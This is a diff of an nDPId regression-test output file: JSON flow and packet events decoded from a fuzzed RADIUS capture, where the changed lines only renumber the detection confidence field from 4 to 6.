00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1528997050255,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997050255,"pkt":"ABRP+0\/qcNuYVcUnCABFAACl\/HNAAPwRV4nG4hk+CgxAHgcUchAIkVSXCzIAiQCjJQAe3VyUfsXAQgu9DVIBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEnsk2TyvRrElAGPaQu1TGoc="} 01327{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1528997050383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997050383,"pkt":"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\/yoSHA=="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528997050448} 
@@ -112,45 +112,45 @@ 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1528997134036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997134036,"pkt":"ABxP+4rqcNuYVcUnCABFAADh\/WZAAPsRV2PG4hk1Cgx4HgcUchAAzWYuCzpCxXGn0Uh9HQ+OyLOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1528997212627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997212627,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1528997217637} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997217103,"pkt":"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"} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1528997221594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997221594,"pkt":"ABRP+4olANuYVcUnCABFAADh\/iUAAPwRVXHGnRk1CgxAHgcUchAAzbneC0AAxXHEG2jtNCK6Pim9jxODZEQBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWYyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5T0oBAgBIFwEAAAEFAAC130tW1AOjyO4EWETLCns4AgUAADpBoI2KsgAA1NEalEdfz2mLAQACCwUAAKYxpY6FFiCOWOh\/rUxMKdLfEvgA+nuQ51DKsqmwU74i6PE="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997221878} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997221594,"pkt":"AAAMB6xAABRP+4rqCABFAALHIPtuAP8RAAAKDEAexuIZNXIQB1QCswAAAUECqxyBDV4hA0zB94U9KheYsYAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8Az1fICQlXSVNQUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1528996068129,"flow_last_seen":1528997222052,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28074,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1528996068129,"flow_last_seen":1528997222052,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28074,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1528997257373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997257373,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/rJAAPwRVQ7G5hk+CgxAHgcUchAAzVNaC0IAxU8cxybfn6wHKrLckjIf7\/YBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6JQA6MzcvMjIwT0oBAgBIFwEAAAEFAAAT7kZq++1qq413Vnves+S4AgUAAGvzvZs2igAAfRnGIlbt+UCLAQACCwUAACpMCwseOO2rxFCxvsNqPXlQEr\/1MOfsnBTEG6mXYQrsxeM="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":620000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997260021,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"flow_datalink":1,"flow_max_packets":3} 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1528997260021,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1528997260021,"pkt":"ABRP+4rqcNuYVcUnCABFAACy\/sZAAPxVVSnG4hk+CgxAHgcUchAAnp2\/A0UAlvMIt1JJhr\/PERoAnbXM5t8BNTAzMTE0czAxNTg4NDk2ODVAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywSN0ExM0FEN0UxOTJDQjEwQRIiMzI3NjQgU3Vic2NyaWJlciBub3QgcCUAdmlzaW9uZSUABwQBAAcAUBIlCbhyzGO3iZxohSCASLvo"} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1528997261783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997261783,"pkt":"dxRP+4rqcNuYVcUnCABFAADh\/sxAAPwRVP3G4lI1CgxAHgcUchAAzQ3qC0YAxVP5rh2w5Lj8PI2upF4y\/0IBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXT3b3JrLm9yZywgNWIyMmE1ODkvZjA6N+g6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADvkK66gUfrDsISd3KA2Dq0AgUAAEGPAVxuDAAAtFagJxCAdoSLAQACCwUAAF3vTu1rfeBtyKrBBShZZHpQEiKq\/RQqlqya5NkwR6FJjV0="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997262078} 01258{"packet_event_id":1,"packet_event_name":"packet","packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997261783,"pkt":"AAAMB6xAABRP+4rqCABFAALHIP0lAP8RAAAKDEAexuIZNXIQBxQCswAAAUcCq0DUTgiBVRdCBPZhxwMy\/T4aCiUAV3EOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqWOATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjODAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwBAasFAFKIA5WWldDMlQxc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkVAEAAAsFAADE2f3MRJYt4jvAki9JKC\/7AwIAIHMK7AgaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAB2V8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAZ8gRC0x5bmRodXJzdBoMABBXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkI
FZhbHVkGh0AADghExc0MC44MG84ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEV\/QAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEsOMLEiMSdbl\/UWsrT5hVfA="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997262272,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1528997262272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997262272,"pkt":"ABRP+4rqcNuYVcUlCABFAAEw\/tJAAPwRVKjG4hk1CgxAHgdnchABHO9uAkcBFNPCS391ou+9cV+4e8winsYaCwAAV8gbBVNQQxpuAAABNxA00HHPRTyBsiZ\/6IZyvYM7SEcCX4QDUPpLB\/Nfl+7+pUh0wsa+NLqA2uxWkFDu5HiEeuARNLVaDzSIzbsbfVqWHWeSG0JbhaHnOPPCnMTZqtKCAvxt6AWKG1d8LjPCNKE\/ymsqNvHxATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNTg5L2YwOjc5OjYwOmQxOjdkOjM3LzIyMFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTw+nZtWuGBh7\/qdpxMTkR"} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 